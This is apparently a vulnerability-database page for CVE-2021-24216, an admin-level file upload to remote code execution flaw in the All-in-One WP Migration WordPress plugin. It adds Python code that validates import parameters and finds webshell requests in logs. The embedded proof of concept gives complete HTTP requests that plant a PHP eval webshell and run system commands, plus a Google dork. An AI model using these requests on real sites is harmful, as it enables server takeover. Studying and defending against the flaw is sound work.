Description
The All-in-One WP Migration WordPress plugin before 7.41 does not validate the extension of the file it writes during an import: the name of the file created under wp-content/plugins/all-in-one-wp-migration/storage/ is taken from the request's "archive" parameter without checking that it ends in .wpress. An administrator (or anyone holding an administrator's session) can therefore upload a PHP file and request it over the web to execute code on the server, even on multisite installations, where site administrators are otherwise not permitted to install plugins or run their own PHP. Fixed in 7.41 (see the referenced changeset); tracked as CVE-2021-24216 (CWE-434).
Related
{"id": "WPEX-ID:87C6052C-2628-4987-A9A3-A03B5CA1E083", "vendorId": null, "type": "wpexploit", "bulletinFamily": "exploit", "title": "All-in-One WP Migration < 7.41 - Admin+ Arbitrary File Upload to RCE", "description": "The plugin does not validate uploaded files' extension, which allows administrators to upload PHP files on their site, even on multisite installations.\n", "published": "2022-02-07T00:00:00", "modified": "2022-04-13T07:36:24", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.5}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, "href": "", "reporter": "YICHENG LIU_chenfeng lab", "references": ["https://plugins.trac.wordpress.org/changeset/2516181#file8"], "cvelist": ["CVE-2021-24216"], "immutableFields": [], "lastseen": "2022-04-15T14:14:51", "viewCount": 23, "enchantments": {"exploitation": null, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24216"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:87C6052C-2628-4987-A9A3-A03B5CA1E083"]}]}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24216"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:87C6052C-2628-4987-A9A3-A03B5CA1E083"]}], "rev": 4}, "score": {"value": 5.7, "vector": "NONE"}, "vulnersScore": 5.7}, "_state": {"dependencies": 0}, "_internal": {}, "sourceData": "To reproduce:\r\n- Log in, click All-in-One WP Migration > Import and use the import-from-file function.\r\n- Intercept the wp-admin/admin-ajax.php?action=ai1wm_import&ai1wm_import=1 request.\r\n- Change the parameters \u201cupload-file\u201d, \u201cstorage\u201d and \u201carchive\u201d. Insert malicious PHP code into \u201cupload-file\u201d. Submit the request.\r\n- Access the URL below to execute system commands: wp-content/plugins/all-in-one-wp-migration/storage/[storage]/[archive]\r\n\r\n# Exploit Title: WordPress All-in-One WP Migration Plugin - Arbitrary File Upload to Remote Code Execution\r\n# Google Dork: inurl:/wp-admin/admin-ajax.php\r\n# Date: 23/12/2020\r\n# Exploit Author: YICHENGLIU_chenfeng lab\r\n# Vendor Homepage: https://cn.wordpress.org/plugins/all-in-one-wp-migration/advanced/\r\n# Version: All-in-One WP Migration <=7.38\r\n# Tested on: Windows 10 (x64)\r\n# Data in HTTP request:\r\n\r\n\r\nPOST example/wp-admin/admin-ajax.php?action=ai1wm_import&ai1wm_import=1 HTTP/1.1\r\nHost: 192.168.9.240\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0\r\nAccept: */*\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://192.168.9.240/WordPresscn/wp-admin/admin.php?page=ai1wm_import\r\nX-Requested-With: XMLHttpRequest\r\nContent-Type: multipart/form-data; boundary=---------------------------3937767834299093780715813797\r\nContent-Length: 740\r\nOrigin: http://192.168.9.240\r\nConnection: close\r\nCookie: wordpress_35a9534a308351ed3717c8a5ae6460b0=admin%7C1616316196%7Cw4f8i4PHSUNfb6q7qC1r6HiV1d78wA1LrdXcmbW51iV%7Caeb6bc83b040df5b4acfbbaf7a18681cb06c3210046627978bad64d8419f06e6; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_35a9534a308351ed3717c8a5ae6460b0=admin%7C1616316196%7Cw4f8i4PHSUNfb6q7qC1r6HiV1d78wA1LrdXcmbW51iV%7Cc6d2ef5724f21ca0e0cc446643f6f8d68c900452b87b412b2eb7282c32161846; wp-settings-time-1=1616143799\r\n\r\n-----------------------------3937767834299093780715813797\r\nContent-Disposition: form-data; name=\"upload-file\"; filename=\"shell.wpress\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php eval($_POST['c']);\r\n-----------------------------3937767834299093780715813797\r\nContent-Disposition: form-data; name=\"priority\"\r\n\r\n5\r\n-----------------------------3937767834299093780715813797\r\nContent-Disposition: form-data; name=\"secret_key\"\r\n\r\n7wD1bP6YC4xB\r\n-----------------------------3937767834299093780715813797\r\nContent-Disposition: form-data; name=\"storage\"\r\n\r\nshell\r\n-----------------------------3937767834299093780715813797\r\nContent-Disposition: form-data; name=\"archive\"\r\n\r\nshell.php\r\n-----------------------------3937767834299093780715813797--\r\n\r\n##########################\r\nexecute shell\r\n##########################\r\nPOST /wordpresscn/wp-content/plugins/all-in-one-wp-migration/storage/shell/shell.php HTTP/1.1\r\nHost: 192.168.9.240\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nAccept-Encoding: gzip, deflate\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 19\r\n\r\nc=system('whoami');\r\n\r\n###########################\r\nExecute response\r\n###########################\r\nHTTP/1.1 200 OK\r\nDate: Fri, 19 Mar 2021 09:00:56 GMT\r\nServer: Apache/2.4.23 (Win32) OpenSSL/1.0.2j mod_fcgid/2.3.9\r\nX-Powered-By: PHP/5.6.27\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 1124\r\n\r\ndesktop-psag0ka\\gongfang-9", "generation": 0}
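The PoC in the record above has two halves: the ai1wm_import upload, in which the "storage" and "archive" fields choose the path the uploaded bytes are written to, and a second request to that path. The Python below is an added example, not code from the record, from the reporter or from the plugin. It rebuilds the PoC's multipart body as a constructed sample, parses it, applies the kind of extension and path check the fixed version needs (the rules are this example's own assumptions, not the code of changeset 2516181), and runs a simple access-log check for PHP files being served out of the plugin's storage tree. The log lines are constructed, and every function and regex name is the example's own.

```python
"""Added example; not part of the WPScan/Vulners record or of the plugin.

Two halves of the PoC are modelled:
  1. The ai1wm_import upload: parse the multipart body, pull out the
     `storage` and `archive` fields that decide where the upload is written,
     and apply an extension/path check (assumed rules, not the plugin's fix).
  2. The follow-up request to storage/<storage>/<archive>: a log check that
     flags .php files requested under the plugin's storage directory.
"""
import re

# Constructed sample: the multipart body from the PoC, rebuilt byte for byte.
BOUNDARY = "---------------------------3937767834299093780715813797"
POC_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="upload-file"; filename="shell.wpress"\r\n'
    "Content-Type: application/octet-stream\r\n"
    "\r\n"
    "<?php eval($_POST['c']);\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="priority"\r\n\r\n5\r\n'
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="secret_key"\r\n\r\n7wD1bP6YC4xB\r\n'
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="storage"\r\n\r\nshell\r\n'
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="archive"\r\n\r\nshell.php\r\n'
    f"--{BOUNDARY}--\r\n"
).encode()

_DISP_PARAM_RE = re.compile(r'(\w[\w-]*)="([^"]*)"')


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Split a multipart/form-data body into {field name: {filename, content_type, data}}."""
    delim = b"--" + boundary.encode()
    fields = {}
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):        # closing delimiter "--boundary--"
            break
        if chunk.startswith(b"\r\n"):      # CRLF that ends the delimiter line
            chunk = chunk[2:]
        head, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):         # CRLF that precedes the next delimiter
            data = data[:-2]
        headers = {}
        for line in head.decode("latin-1").split("\r\n"):
            key, _, value = line.partition(":")
            headers[key.strip().lower()] = value.strip()
        params = dict(_DISP_PARAM_RE.findall(headers.get("content-disposition", "")))
        fields[params.get("name", "")] = {
            "filename": params.get("filename"),
            "content_type": headers.get("content-type"),
            "data": data,
        }
    return fields


# Assumed hardening rules (this example's, not the plugin's code). The on-disk
# name comes from the `archive` field, not from the upload's filename, so that
# is the value that has to be constrained.
STORAGE_RE = re.compile(r"^[A-Za-z0-9]+$")


def validate_import_params(storage: str, archive: str) -> list:
    """Return a list of problems; an empty list means the parameters are acceptable."""
    problems = []
    if not STORAGE_RE.fullmatch(storage):
        problems.append("storage: must be a single alphanumeric token")
    if not archive or "/" in archive or "\\" in archive or ".." in archive:
        problems.append("archive: must be a bare file name without path separators")
    if not archive.lower().endswith(".wpress"):
        problems.append("archive: extension must be .wpress")
    return problems


def inspect_import_request(body: bytes, boundary: str):
    """Parse an ai1wm_import body and validate the fields that choose the write path."""
    fields = parse_multipart(body, boundary)
    storage = fields.get("storage", {}).get("data", b"").decode("utf-8", "replace")
    archive = fields.get("archive", {}).get("data", b"").decode("utf-8", "replace")
    return fields, validate_import_params(storage, archive)


# Second half of the PoC: the webshell is reached as a .php file under the
# plugin's storage directory, which never legitimately serves PHP.
STORAGE_PHP_RE = re.compile(
    r'/all-in-one-wp-migration/storage/[^/\s"]+/[^\s"]*\.php\b', re.IGNORECASE
)

# Constructed access-log lines (Apache combined style), not taken from any real host.
LOG_LINES = [
    '192.168.9.240 - - [19/Mar/2021:09:00:56 +0000] "POST /wordpresscn/wp-content/plugins/all-in-one-wp-migration/storage/shell/shell.php HTTP/1.1" 200 1124',
    '10.0.0.5 - - [19/Mar/2021:09:01:10 +0000] "GET /wordpresscn/wp-admin/admin.php?page=ai1wm_import HTTP/1.1" 200 5120',
    '10.0.0.5 - - [19/Mar/2021:09:02:00 +0000] "GET /wordpresscn/wp-content/plugins/all-in-one-wp-migration/storage/a1b2c3/backup.wpress HTTP/1.1" 200 9000',
]


def find_storage_php_hits(log_lines) -> list:
    """Return the log lines that request a .php file from the plugin's storage tree."""
    return [line for line in log_lines if STORAGE_PHP_RE.search(line)]


if __name__ == "__main__":
    fields, problems = inspect_import_request(POC_BODY, BOUNDARY)
    print("archive =", fields["archive"]["data"], "storage =", fields["storage"]["data"])
    print("PoC request problems:", problems or "none")
    print("benign import:", validate_import_params("a1b2c3", "backup.wpress") or "accepted")
    for hit in find_storage_php_hits(LOG_LINES):
        print("storage PHP hit:", hit)
```

The check is deliberately applied to the "archive" field rather than to the upload's own filename: the PoC names the upload shell.wpress and still lands shell.php on disk, so the part of the request that picks the file name is the part that has to be validated. The log check is the after-the-fact counterpart for a site that was running an affected version before updating, since patching does not remove a file that was already written.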
{"cve": [{"lastseen": "2022-03-23T14:49:31", "description": "The All-in-One WP Migration WordPress plugin before 7.41 does not validate uploaded files' extension, which allows administrators to upload PHP files on their site, even on multisite installations.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-07T09:15:00", "type": "cve", "title": "CVE-2021-24216", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24216"], "modified": "2022-03-11T17:43:00", "cpe": [], "id": "CVE-2021-24216", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24216", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}], "wpvulndb": [{"lastseen": "2022-04-15T14:14:51", "description": "The plugin does not validate uploaded files' extension, which allows administrators to upload PHP files on their site, even on multisite installations.\n\n### PoC\n\nTo reproduce: - Log in, click All-in-One WP Migration > Import and use the import-from-file function. - Intercept the wp-admin/admin-ajax.php?action=ai1wm_import&ai1wm_import=1 request. - Change the parameters \u201cupload-file\u201d, \u201cstorage\u201d and \u201carchive\u201d. Insert malicious PHP code into \u201cupload-file\u201d. Submit the request. - Access the URL below to execute system commands: wp-content/plugins/all-in-one-wp-migration/storage/[storage]/[archive] # Exploit Title: WordPress All-in-One WP Migration Plugin - Arbitrary File Upload to Remote Code Execution # Google Dork: inurl:/wp-admin/admin-ajax.php # Date: 23/12/2020 # Exploit Author: YICHENGLIU_chenfeng lab # Vendor Homepage: https://cn.wordpress.org/plugins/all-in-one-wp-migration/advanced/ # Version: All-in-One WP Migration <=7.38 # Tested on: Windows 10 (x64) # Data in HTTP request: POST example/wp-admin/admin-ajax.php?action=ai1wm_import&ai1wm_import=1 HTTP/1.1 Host: 192.168.9.240 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://192.168.9.240/WordPresscn/wp-admin/admin.php?page=ai1wm_import X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------3937767834299093780715813797 Content-Length: 740 Origin: http://192.168.9.240 Connection: close Cookie: wordpress_35a9534a308351ed3717c8a5ae6460b0=admin%7C1616316196%7Cw4f8i4PHSUNfb6q7qC1r6HiV1d78wA1LrdXcmbW51iV%7Caeb6bc83b040df5b4acfbbaf7a18681cb06c3210046627978bad64d8419f06e6; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_35a9534a308351ed3717c8a5ae6460b0=admin%7C1616316196%7Cw4f8i4PHSUNfb6q7qC1r6HiV1d78wA1LrdXcmbW51iV%7Cc6d2ef5724f21ca0e0cc446643f6f8d68c900452b87b412b2eb7282c32161846; wp-settings-time-1=1616143799 -----------------------------3937767834299093780715813797 Content-Disposition: form-data; name=\"upload-file\"; filename=\"shell.wpress\" Content-Type: application/octet-stream \n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-07T00:00:00", "type": "wpvulndb", "title": "All-in-One WP Migration < 7.41 - Admin+ Arbitrary File Upload to RCE", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24216"], "modified": "2022-04-13T07:36:24", "id": "WPVDB-ID:87C6052C-2628-4987-A9A3-A03B5CA1E083", "href": "https://wpscan.com/vulnerability/87c6052c-2628-4987-a9a3-a03b5ca1e083", "sourceData": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}